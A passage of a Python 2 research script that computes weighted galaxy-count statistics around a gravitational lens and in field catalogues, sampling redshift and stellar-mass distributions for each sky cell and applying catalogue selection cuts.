np.zeros((cells_on_a_side,cells_on_a_side))\n mass_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass2_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass2rms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3rms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n oneoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n massoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass2overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zmassoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zmass2overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass2overrrms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3overrrms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n # for each cell, I will have 100 or 1000 realizations of the weighted sums\n gal_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n oneoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zweight_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2rms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3rms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n massoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmassoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmass2overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overrrms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overrrms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n # tabulated PDF for z and Mstar\n gal_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n oneoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zweight_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2rms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3rms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n massoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmassoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmass2overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overrrms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overrrms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n #if str(sys.argv[8]) == \"orig\":\n gal_lensorig[i][j]=len(catupdate_lens[i][j][0])\n zweight_lensorig[i][j] = np.sum((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z']))\n mass_lensorig[i][j] = np.sum(10**catupdate_lens[i][j][0]['mass_med'])\n mass2_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']))\n mass3_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']))\n mass2rms_lensorig[i][j] = np.sqrt(mass2_lensorig[i][j])\n mass3rms_lensorig[i][j] = scipy.special.cbrt(mass3_lensorig[i][j])\n oneoverr_lensorig[i][j] = np.sum(1. / catupdate_lens[i][j][0]['dist'])\n zoverr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) / catupdate_lens[i][j][0]['dist'])\n massoverr_lensorig[i][j] = np.sum(10**catupdate_lens[i][j][0]['mass_med'] / catupdate_lens[i][j][0]['dist'])\n mass2overr_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n mass3overr_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n zmassoverr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n zmass2overr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n mass2overrrms_lensorig[i][j] = np.sqrt(mass2overr_lensorig[i][j])\n mass3overrrms_lensorig[i][j] = scipy.special.cbrt(mass3overr_lensorig[i][j])\n\n # from here on I sample from the PDFs of z and Mstar. Here I'm using symplified PDFs, since I only have the most probable values and +/-1sigma\n #if str(sys.argv[8]) == \"samp\":\n sample_lensz=np.zeros((len(catupdate_lens[i][j][0]['z']),int(str(sys.argv[4]))))\n # for each object, create 100 or 1000 samples\n sample_lensmass=np.zeros((len(catupdate_lens[i][j][0]['mass_med']),int(str(sys.argv[4]))))\n frac_lensz=1-1.0*(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z'])/(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z_inf'])\n frac_lensmass=1-(1.0*(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_med'])/(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_inf']))\n for k in range(len(catupdate_lens[i][j][0]['z'])): # for each object, create its samples\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n if (frac_lensz[k] > 0) and (frac_lensz[k] < 1):\n # in this case I sample from two gaussians, to the left and right of the most probable value\n sample_lenssup=catupdate_lens[i][j][0]['z'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z'][k], int(str(sys.argv[4]))))\n sample_lensinf=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], int(str(sys.argv[4]))))\n # make sure redshifts are positive\n while len(sample_lensinf[sample_lensinf<0]) > 0:\n sample_lensinf[sample_lensinf<0]=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], len(sample_lensinf[sample_lensinf<0])))\n rand=np.random.random(int(str(sys.argv[4])))\n sample_lensz[k]=sample_lensinf\n sample_lensz[k][np.where(rand>frac_lensz[k])]=sample_lenssup[np.where(rand>frac_lensz[k])]\n #sample_lensz[k][sample_lensz[k]<0]=0\n if (frac_lensz[k] <= 0) or (frac_lensz[k] >= 1):\n # in this case I ignore the most probable value and I sample from a single gaussian centered in the middle of +/-1sigma\n sample_lensz[k]=np.random.normal(catupdate_lens[i][j][0]['z_inf'][k]+(catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z_inf'][k])/2, (catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z_inf'][k])/2, int(str(sys.argv[4])))\n #sample_lensz[k][sample_lensz[k]<0]=0\n # for mass, assume gaussian distribution in log, not normal space, so I don't get things like negative mass\n if (frac_lensmass[k] > 0) and (frac_lensmass[k] < 1):\n sample_lenssup=10**(catupdate_lens[i][j][0]['mass_med'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_med'][k], int(str(sys.argv[4])))))\n sample_lensinf=10**(catupdate_lens[i][j][0]['mass_med'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_med'][k]-catupdate_lens[i][j][0]['mass_inf'][k], int(str(sys.argv[4])))))\n rand=np.random.random(int(str(sys.argv[4])))\n sample_lensmass[k]=sample_lensinf\n sample_lensmass[k][np.where(rand>frac_lensmass[k])]=sample_lenssup[np.where(rand>frac_lensmass[k])] # sampling to the left or right\n if (frac_lensmass[k] <= 0) or (frac_lensmass[k] >= 1):\n sample_lensmass[k]=10**np.random.normal(catupdate_lens[i][j][0]['mass_inf'][k]+(catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_inf'][k])/2, (catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_inf'][k])/2, int(str(sys.argv[4])))\n for k in range(int(str(sys.argv[4]))):\n # for each sample ID, sum up the weights of different objects\n # ignore objects with z>z_source for all weights when drawing from the z PDF\n gal_lens[i][j][k]=len(sample_lensz[:,k][sample_lensz[:,k]<z_s_lens])\n oneoverr_lens[i][j][k] = np.sum(1. / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zweight_lens[i][j][k] = np.sum((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2))\n mass_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens])\n mass2_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2)\n mass3_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3)\n mass2rms_lens[i][j][k] = np.sqrt(mass2_lens[i][j][k])\n mass3rms_lens[i][j][k] = scipy.special.cbrt(mass3_lens[i][j][k])\n zoverr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n massoverr_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens] / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overr_lens[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass3overr_lens[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmassoverr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmass2overr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overrrms_lens[i][j][k] = np.sqrt(mass2overr_lens[i][j][k])\n mass3overrrms_lens[i][j][k] = scipy.special.cbrt(mass3overr_lens[i][j][k])\n\n #if str(sys.argv[8]) == \"tab\":\n sample_lensz=np.zeros((len(catupdate_lens[i][j][0]['z']),int(str(sys.argv[4]))))\n # for each object, create 100 or 1000 samples\n sample_lensmass=np.zeros((len(catupdate_lens[i][j][0]['mass_med']),int(str(sys.argv[4]))))\n frac_lensz=1-1.0*(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z'])/(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z_inf'])\n frac_lensmass=1-(1.0*(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_med'])/(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_inf']))\n for k in range(len(catupdate_lens[i][j][0]['z'])): # for each object, create its samples\n #print \"cat\",k\n if catupdate_lens[i][j][0]['specz?'][k]==0: # tabulated values for non-specz objects\n dummy=pdzcat_lens[pdzcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][1:]\n dummy[dummy<0.001]=0\n z_tab=dummy\n #print \"z_tab\", catupdate_lens[i][j][0]['ID'][k], z_tab\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n for l in range(70): # for each of the tabulated points\n if z_tab[l]!=0:\n massbest_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][7+l*4]+catupdate_lens[i][j][0]['correction'][k]\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][9+l*4]>=0:\n massmed_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][9+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n massmed_tab[l]=massbest_tab[l]\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][8+l*4]>=0:\n massinf_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][8+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n massinf_tab[l]=massmed_tab[l]-0.1\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][10+l*4]>=0:\n masssup_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][10+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n masssup_tab[l]=massmed_tab[l]+0.1\n #print \"massbest_tab\", massbest_tab\n #print \"massinf_tab\", massinf_tab\n #print \"massmed_tab\", massmed_tab\n #print \"masssup_tab\", masssup_tab\n custm = stats.rv_discrete(name='custm', values=(zgridint, z_tab)) # sample from the tabulated distribution\n sample=custm.rvs(size=int(str(sys.argv[4]))) # Weird, sometimes custm samples from places where the distribution is 0. Below I ensure this doesn't happen. The cause is probably due to the probabilities not summing exactly to 1\n while len(sample[z_tab[sample]==0]) != 0:\n sample=custm.rvs(size=int(str(sys.argv[4])))\n sample_lensz[k]=zgrid[sample]\n #print \"sample\",sample\n #print \"sample_lensz1[k]\", k, sample_lensz[k]\n sample_massinf_tab=massinf_tab[sample] # since sample is constant, this insures that Mstar corresponds to z\n sample_massmed_tab=massmed_tab[sample]\n sample_masssup_tab=masssup_tab[sample]\n #print \"sample_massmed_tab\", sample_massmed_tab\n #print \"sample_masssup_tab\", sample_masssup_tab\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n for l in range(int(str(sys.argv[4]))):\n sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n rand=np.random.random(1)\n sample_lensmass[k][l]=sample_lensinf[l]\n frac_lensmass_samp=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n if rand>frac_lensmass_samp:\n sample_lensmass[k][l]=sample_lenssup[l]\n #print \"sample_lensmass1[k]\", k, sample_lensmass[k]\n else: # for the zpecz objects, since the input catalogue is properly edited so that \"frac\" is well-behaved, this section is a stripped-down version of \"samp\"\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n # in this case I sample from two gaussians, to the left and right of the most probable value\n sample_lenssup=catupdate_lens[i][j][0]['z'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z'][k], int(str(sys.argv[4]))))\n sample_lensinf=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], int(str(sys.argv[4]))))\n # make sure redshifts are positive\n while len(sample_lensinf[sample_lensinf<0]) > 0:\n sample_lensinf[sample_lensinf<0]=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], len(sample_lensinf[sample_lensinf<0])))\n rand=np.random.random(int(str(sys.argv[4])))\n sample_lensz[k]=sample_lensinf\n sample_lensz[k][np.where(rand>frac_lensz[k])]=sample_lenssup[np.where(rand>frac_lensz[k])]\n #print \"sample_lensz2[k]\", k, sample_lensz[k]\n #sample_lensz[k][sample_lensz[k]<0]=0\n sample_lenssup=10**(catupdate_lens[i][j][0]['mass_med'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_med'][k], int(str(sys.argv[4])))))\n sample_lensinf=10**(catupdate_lens[i][j][0]['mass_med'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_med'][k]-catupdate_lens[i][j][0]['mass_inf'][k], int(str(sys.argv[4])))))\n rand=np.random.random(int(str(sys.argv[4])))\n sample_lensmass[k]=sample_lensinf\n sample_lensmass[k][np.where(rand>frac_lensmass[k])]=sample_lenssup[np.where(rand>frac_lensmass[k])]\n #print \"sample_lensmass2[k]\", k, sample_lensmass[k]\n for k in range(int(str(sys.argv[4]))):\n # sum up the weights of different objects, corresponding to the same realization ID\n # ignore objects with z>z_source for all weights when drawing from the z PDF\n gal_lens_tab[i][j][k]=len(sample_lensz[:,k][sample_lensz[:,k]<z_s_lens])\n oneoverr_lens_tab[i][j][k] = np.sum(1. / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zweight_lens_tab[i][j][k] = np.sum((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2))\n mass_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens])\n mass2_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2)\n mass3_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3)\n mass2rms_lens_tab[i][j][k] = np.sqrt(mass2_lens[i][j][k])\n mass3rms_lens_tab[i][j][k] = scipy.special.cbrt(mass3_lens[i][j][k])\n zoverr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n massoverr_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens] / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overr_lens_tab[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass3overr_lens_tab[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmassoverr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmass2overr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overrrms_lens_tab[i][j][k] = np.sqrt(mass2overr_lens[i][j][k])\n mass3overrrms_lens_tab[i][j][k] = scipy.special.cbrt(mass3overr_lens[i][j][k])\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#print gal_lens, sigma_mass2rms_lens\n\n# I think RuntimeWarning: invalid value encountered in double_scalars can be ignored because it shows up only for rms weights, which means it's due to division by zero for the cells completely covered by the masks\n\n# Initialize all field weight measurements as blank matrices\n\n #if str(sys.argv[8]) == \"orig\":\n origfield_gal = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zweight = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass2 = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass3 = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_massoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n field_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n tab_field_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n# Use objects from the field catalogue that pass the redshift, separation, and mask tests\n\n print 'Computing field weights...'\n start_time = time.time()\n i=0\n pos_mstar=0\n #pos_mstar_remember=0\n with open('%s.cat' % [c[0:len(listfields[0])-1] for c in listfields][count]) as fieldcat:\n for gal in fieldcat:\n if (gal!=\"\\n\") and (gal.split()[0]!=\"#id\"):\n i=i+1\n #print i\n catfield=Table(names=('ID','ALPHA_J2000','DELTA_J2000','MASK','star_flag','MAG_i','MAG_y','Z_B','Z_B_MIN','Z_B_MAX','LP_log10_SM_MED','LP_log10_SM_INF','LP_log10_SM_SUP'),dtype=('<S13', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8'))\n catfield.add_row([str(gal.split()[0]),gal.split()[4],gal.split()[5],gal.split()[36],gal.split()[60],gal.split()[79],gal.split()[84],gal.split()[39],gal.split()[40],gal.split()[41],gal.split()[61],gal.split()[62],gal.split()[63]])\n #print catfield[0]\n if i in [1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000]:\n print i, \"objects...\"\n if (catfield['MASK'][0] == 0) and (catfield['star_flag'][0] == 0) and ((catfield['MAG_i'][0] <= float(str(sys.argv[6])) and catfield['MAG_i'][0] > 0) or (catfield['MAG_y'][0] <= float(str(sys.argv[6])) and catfield['MAG_y'][0] > 0)): # above threshold in either i or y bands\n coordfieldwcs = SkyCoord(ra=catfield[0]['ALPHA_J2000']*u.degree, dec=catfield[0]['DELTA_J2000']*u.degree, frame='fk5')\n #print coordfieldwcs.ra.deg, coordfieldwcs.dec.deg\n #print i\n with open('%s_pdz.cat' % [z[0:len(listfields[0])-1] for z in listfields][count]) as pdzcat:\n galpdz=pdzcat.readlines()\n linepdz=galpdz[i]\n with open('%s_mstar.cat' % [z[0:len(listfields[0])-1] for z in listfields][count]) as mstarcat:\n for m in xrange(pos_mstar):\n mstarcat.next()\n for galmstar in mstarcat:\n pos_mstar=pos_mstar+1\n if galmstar!=\"\\n\":\n if galmstar.split()[0]==catfield['ID'][0]:\n linemstar=galmstar\n break\n # classification criteria:\n where = (int(np.max([catfield['Z_B'][0]/0.05, 1])) * 6) # find the position in mstar.cat corresponding to z_b, in order to read chi_star and chi_gal\n #print catfield['ID'][0],float(linemstar.split()[where-1]),float(linemstar.split()[where]),where\n cond1 = str(sys.argv[7])==\"old\"\n cond2 = (str(sys.argv[7])==\"new\") and (((catfield['MAG_i'][0] <=23) and (catfield['MAG_i'][0] >0)) or ((catfield['MAG_y'][0] <=23) and (catfield['MAG_y'][0] >0)))\n if (where < 420) and (float(linemstar.split()[where])!=0):\n cond3 = (str(sys.argv[7])==\"new\") and (float(linemstar.split()[where-1])/float(linemstar.split()[where])<0.5)\n else:\n cond3 = 1>2\n if (where < 420) and (cond1 or cond2 or cond3):\n #print linemstar.split()[0], linepdz.split()[0], catfield['ID'][0]\n coordfieldpix = worldfield.wcs_world2pix(coordfieldwcs.ra.deg, coordfieldwcs.dec.deg, 0)\n x = int((coordfieldpix[0] * pixCFHT) / (240.0 * u.arcsec))\n y = int((coordfieldpix[1] * pixCFHT) / (240.0 * u.arcsec))\n #print \"x,y\",x,y\n cellpix_x = coordfieldpix[0] - (x * 240.0 * u.arcsec / pixCFHT)\n cellpix_y = coordfieldpix[1] - (y * 240.0 * u.arcsec / pixCFHT)\n sep = coordfieldwcs.separation(centerfields[x][y]).arcsec\n if (maskedcell[x][y] >= 0.50):\n if (sep >= 4) and (msk_lens[0].data[(cellpix_y 